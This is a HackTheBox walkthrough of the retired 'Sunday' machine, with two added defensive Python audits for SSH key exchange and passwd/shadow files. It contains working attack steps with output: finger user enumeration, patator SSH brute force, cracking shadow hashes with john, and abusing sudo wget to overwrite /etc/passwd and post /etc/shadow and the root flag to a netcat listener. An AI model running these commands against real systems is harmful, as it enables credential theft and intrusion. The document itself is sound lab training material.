This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Sunday
Difficulty: Easy
Machine IP: 10.10.10.76
It takes about half an hour for the full port scan to complete.
artis3n@kali-pop:~/shares/htb/sunday$ sudo nmap -sS -T4 -p- 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 15:58 EDT
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.25% done
Warning: 10.10.10.76 giving up on port because retransmission cap hit (6).
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.13% done; ETC: 16:28 (0:29:02 remaining)
Stats: 0:02:28 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 8.24% done; ETC: 16:28 (0:27:40 remaining)
Stats: 0:03:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.57% done; ETC: 16:27 (0:26:22 remaining)
Stats: 0:06:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 22.01% done; ETC: 16:27 (0:22:52 remaining)
Stats: 0:09:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.52% done; ETC: 16:27 (0:18:58 remaining)
Stats: 0:16:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 56.46% done; ETC: 16:26 (0:12:30 remaining)
Stats: 0:17:42 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 61.92% done; ETC: 16:26 (0:10:53 remaining)
Stats: 0:22:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 77.37% done; ETC: 16:26 (0:06:27 remaining)
Stats: 0:25:51 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 91.06% done; ETC: 16:26 (0:02:32 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.013s latency).
Not shown: 55470 closed ports, 10060 filtered ports
PORT STATE SERVICE
79/tcp open finger
111/tcp open rpcbind
22022/tcp open unknown
35809/tcp open unknown
56550/tcp open unknown
From there I can dig into the ports.
artis3n@kali-pop:~/shares/htb/sunday$ sudo nmap -sS -T4 -A -p 79,111,22022,35809,56550 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 16:32 EDT
Nmap scan report for 10.10.10.76
Host is up (0.050s latency).
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
| No one logged on
| HTTPOptions:
| Login Name TTY Idle When Where
| OPTIONS ???
| HTTP/1.0 ???
| Help:
| Login Name TTY Idle When Where
| HELP ???
| RTSPRequest:
| Login Name TTY Idle When Where
| OPTIONS ???
|_ RTSP/1.0 ???
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
35809/tcp open unknown
56550/tcp open unknown
Notably:
- A finger service is running on tcp/79.
- SSH is running on tcp/22022.
finger is not something I was familiar with before this box, so I had a lot of learning to do. finger is used to enumerate information about system users.
I can enumerate users on the system with:
artis3n@kali-pop:~/shares/htb/sunday$ finger [email protected]
Login Name TTY Idle When Where
xvm xVM User < . . . . >
openldap OpenLDAP User < . . . . >
nobody NFS Anonymous Access < . . . . >
noaccess No Access User < . . . . >
nobody4 SunOS 4.x NFS Anonym < . . . . >
Well, that didn’t work.
I eventually found finger-user-enum.pl.
This will take a long time to run, but it eventually finds a sunny user.
./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 | less -S
The official write-up includes the discovery of another user on the system, sammy, but I wasn’t able to find it myself.
With these two users, I can use patator to brute force an SSH login.
patator ssh_login host=10.10.10.76 port=22022 password=FILE0 0=/usr/share/seclists/Passwords/probable-v2-top1575.txt user=sunny -x ignore:mesg='Authentication failed.'
This also takes a while but eventually I get a valid SSH session.
18:12:16 patator INFO - 1 23 30.028 | gemini | 208 | Authentication timeout.
18:12:25 patator INFO - 1 23 30.026 | beauty | 794 | Authentication timeout.
18:12:46 patator INFO - 1 23 30.021 | butterfly | 218 | Authentication timeout.
18:12:53 patator INFO - 0 19 0.036 | sunday | 880 | SSH-2.0-Sun_SSH_1.3
18:12:55 patator INFO - 1 23 30.022 | denver | 804 | Authentication timeout.
18:13:16 patator INFO - 1 23 30.023 | apples | 228 | Authentication timeout.
18:13:25 patator INFO - 1 23 30.024 | jeffrey | 814 | Authentication timeout.
18:13:46 patator INFO - 1 23 30.015 | arthur | 238 | Authentication timeou
Looks like the password for sunny is sunday.
Trying to SSH onto the server results in a key negotiation failure:
artis3n@kali-pop:~/shares/htb/sunday$ ssh -p 22022 sunny@10.10.10.76
Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found.
Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
I just need to choose any of the offered key exchange algorithms and I can SSH onto the box.
ssh -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established.
RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$
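The negotiation failure above is a finding in its own right: the server offers only legacy key-exchange methods, and the client flag merely re-enables one of them. The following is an added example, not part of the original write-up, that parses ssh's "Their offer:" diagnostic and classifies each offered method so the server-side weakness can be reported rather than worked around.

```python
import re

def parse_offer(ssh_stderr):
    """Extract the algorithm list from ssh's 'Their offer: a,b,c' diagnostic."""
    m = re.search(r"Their offer:\s*(\S+)", ssh_stderr)
    return m.group(1).split(",") if m else []

def kex_weaknesses(name):
    """Reasons a key-exchange method counts as legacy: the fixed 1024-bit group
    (Oakley group 2) behind *group1*, and SHA-1 as the exchange hash. Current
    OpenSSH clients leave these out of their defaults, which is what produced
    the error above."""
    reasons = []
    if "group1-" in name:
        reasons.append("1024-bit fixed DH group")
    if "-sha1" in name:
        reasons.append("SHA-1 exchange hash")
    return reasons

def assess_offer(ssh_stderr):
    """Split a server's offer into acceptable methods and legacy ones with reasons."""
    offered = parse_offer(ssh_stderr)
    legacy = {a: kex_weaknesses(a) for a in offered if kex_weaknesses(a)}
    return {"acceptable": [a for a in offered if a not in legacy], "legacy": legacy}

# The diagnostic exactly as printed above, kept here as the sample input.
SUNDAY_OFFER = (
    "Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. "
    "Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,"
    "diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1"
)

if __name__ == "__main__":
    result = assess_offer(SUNDAY_OFFER)
    for name, why in result["legacy"].items():
        print(f"legacy KEX {name}: {', '.join(why)}")
    if not result["acceptable"]:
        # Re-enabling a legacy method with -oKexAlgorithms=+... is a client-side
        # workaround; the fix is a modern KexAlgorithms list on the server.
        print("no modern key exchange offered; server configuration needs updating")
```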
The sunny user does not have a user.txt flag, so it must be under sammy.
sunny can run a troll script as root, which doesn’t enable anything. Troll, indeed.
sunny@sunday:/backup$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
ls -la highlights a backup directory in the system root.
sunny@sunday:/backup$ ls -la /
total 527
drwxr-xr-x 26 root root 27 2018-04-24 12:57 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..
drwxr-xr-x 2 root root 4 2018-04-15 20:44 backup
lrwxrwxrwx 1 root root 9 2018-04-15 19:52 bin -> ./usr/bin
drwxr-xr-x 6 root sys 7 2018-04-15 19:52 boot
drwxr-xr-x 2 root root 2 2018-04-16 15:33 cdrom
drwxr-xr-x 85 root sys 265 2020-06-21 20:00 dev
drwxr-xr-x 4 root sys 10 2020-06-21 20:00 devices
drwxr-xr-x 77 root sys 224 2020-06-21 20:00 etc
drwxr-xr-x 3 root root 3 2018-04-15 19:44 export
dr-xr-xr-x 1 root root 1 2020-06-21 20:00 home
drwxr-xr-x 19 root sys 20 2018-04-15 19:45 kernel
drwxr-xr-x 10 root bin 180 2018-04-15 19:45 lib
drwx------ 2 root root 2 2009-05-14 21:27 lost+found
drwxr-xr-x 2 root root 4 2020-06-21 20:00 media
drwxr-xr-x 2 root sys 2 2018-04-15 19:52 mnt
dr-xr-xr-x 1 root root 1 2020-06-21 20:00 net
drwxr-xr-x 4 root sys 4 2018-04-15 19:52 opt
drwxr-xr-x 5 root sys 5 2009-05-14 21:21 platform
dr-xr-xr-x 54 root root 480032 2020-06-21 21:23 proc
drwx------ 6 root root 13 2018-04-24 10:31 root
drwxr-xr-x 4 root root 4 2018-04-15 19:52 rpool
drwxr-xr-x 2 root sys 58 2018-04-15 19:53 sbin
drwxr-xr-x 4 root root 4 2009-05-14 21:18 system
drwxrwxrwt 4 root sys 384 2020-06-21 20:01 tmp
drwxr-xr-x 30 root sys 44 2018-04-15 19:46 usr
drwxr-xr-x 35 root sys 35 2018-04-15 20:26 var
Navigating there, I find a shadow.backup file which seems to be a copy of /etc/shadow. It includes the sammy user’s password hash.
sunny@sunday:~$ cd /backup
sunny@sunday:/backup$ ls -la
total 5
drwxr-xr-x 2 root root 4 2018-04-15 20:44 .
drwxr-xr-x 26 root root 27 2018-04-24 12:57 ..
-r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
john is able to make quick work of the hash.
➜ john shadow.txt --wordlist=/home/artis3n/Documents/SecLists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (sammy)
1g 0:00:00:13 DONE (2020-06-21 17:21) 0.07462g/s 15589p/s 15589c/s 15589C/s dominique15..153462
Use the "--show" option to display all of the cracked passwords reliably
Session completed
I can now SSH onto the box as sammy with the password cooldude!.
sammy can run wget as root.
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
I can use this to overwrite a file on the file system.
GTFOBins has some examples.
One option is to overwrite the /root/troll script that sunny has access to execute. But I’d like to go even simpler. Let’s look at /etc/passwd.
sammy@sunday:~$ cat /etc/passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm:x:15:3:Datalink Admin:/:
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm:x:60:60:xVM User:/:
mysql:x:70:70:MySQL Reserved UID:/:
openldap:x:75:75:OpenLDAP User:/:
webservd:x:80:80:WebServer Reserved UID:/:
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
I copy this down and modify it locally so that root now has a password defined as root.
root:root:0:0:Super-User:/root:/usr/bin/bash
Now I can call wget as the sammy user and overwrite /etc/passwd.
sudo wget http://10.10.14.41:8000/passwd -O /etc/passwd
Hmm… this didn’t work.
I imagine there is a root password hash in the real /etc/shadow taking precedence.
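Two findings on this box share one root cause: the world-readable shadow.backup hands an attacker the sammy and sunny hashes for offline cracking, and the /etc/passwd edit above fails because login reads the hash from the shadow entry whenever one exists. The following is an added example, not part of the original write-up, that audits passwd against shadow the way a host-integrity check would, using a constructed subset of the entries shown on this page (the Solaris NP and *LK* conventions are classified as seen in shadow.backup).

```python
import re
# Constructed subset of the /etc/passwd and /etc/shadow entries shown above,
# with root's passwd field edited the way the write-up attempts.
PASSWD_TAMPERED = """\
root:root:0:0:Super-User:/root:/usr/bin/bash
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
"""
SHADOW = """\
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""
def parse_colon_file(text):
    """Map username -> field list for passwd/shadow style files."""
    rows = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            rows[line.split(":")[0]] = line.split(":")
    return rows

def shadow_state(field):
    """Classify a Solaris shadow password field (values as seen in shadow.backup)."""
    if field == "":
        return "empty"        # password-less login
    if field == "NP":
        return "no-password"  # Solaris: no password set, password login not possible
    if field.startswith("*LK*"):
        return "locked"
    if re.match(r"^\$(1|5|6|2[aby]?)\$", field):
        return "hashed"       # crypt(3) hash: crackable offline if the file leaks
    return "unknown"

def effective_secret(user, passwd, shadow):
    """The credential login actually checks: the shadow entry wins when one exists,
    which is why editing the passwd field above had no effect."""
    return shadow[user][1] if user in shadow else passwd[user][1]

def audit(passwd_text, shadow_text):
    """Return {user: (shadow state, [findings])} for every passwd entry."""
    passwd, shadow = parse_colon_file(passwd_text), parse_colon_file(shadow_text)
    report = {}
    for user, f in passwd.items():
        notes = []
        if f[1] != "x":
            notes.append("passwd password field is not 'x' (tampering or unshadowed entry)")
        state = shadow_state(shadow[user][1]) if user in shadow else "no-shadow-entry"
        if state == "hashed":
            notes.append("hash present: exposed to offline cracking if a copy is readable")
        report[user] = (state, notes)
    return report
```

Run against the real files, the same audit would also flag the readable /backup/shadow.backup copy as the leak that made the sammy hash crackable in the first place.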
So much for simpler.
I could go back to /root/troll, but now I want to beat this. I opt to stream /etc/shadow’s contents off the target.
I set up a netcat listener on my host:
artis3n@kali-pop:~/shares/htb/sunday$ sudo nc -lvnp 80 > shadow
listening on [any] 80 ...
connect to [10.10.14.41] from (UNKNOWN) [10.10.10.76] 53870
^C
On the target, I post the file with wget:
sammy@sunday:~$ sudo /usr/bin/wget --post-file=/etc/shadow 10.10.14.41
--21:41:02-- http://10.10.14.41/
=> `index.html'
Connecting to 10.10.14.41:80... connected.
HTTP request sent, awaiting response... No data received.
I now have the contents of /etc/shadow.
artis3n@kali-pop:~/shares/htb/sunday$ cat shadow
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.41
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 634
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I move the root hash to a file of its own and try to crack it with john.
john root_pass --wordlist=/home/artis3n/Documents/SecLists/Passwords/Leaked-Databases/rockyou.txt
This does not work, nor do a few other wordlists.
I admit defeat.
I opt to grab the root flag off the device with wget.
sammy@sunday:~$ sudo /usr/bin/wget --post-file=/root/root.txt 10.10.14.41
--21:49:39-- http://10.10.14.41/
=> `index.html'
Connecting to 10.10.14.41:80... connected.
HTTP request sent, awaiting response...
artis3n@kali-pop:~/shares/htb/sunday$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.41] from (UNKNOWN) [10.10.10.76] 63352
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.41
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
fb40fab61d99d37536daeec0d97af9b8
I did not feel confident walking away from this box, but at the end of the day I got the flags that I needed.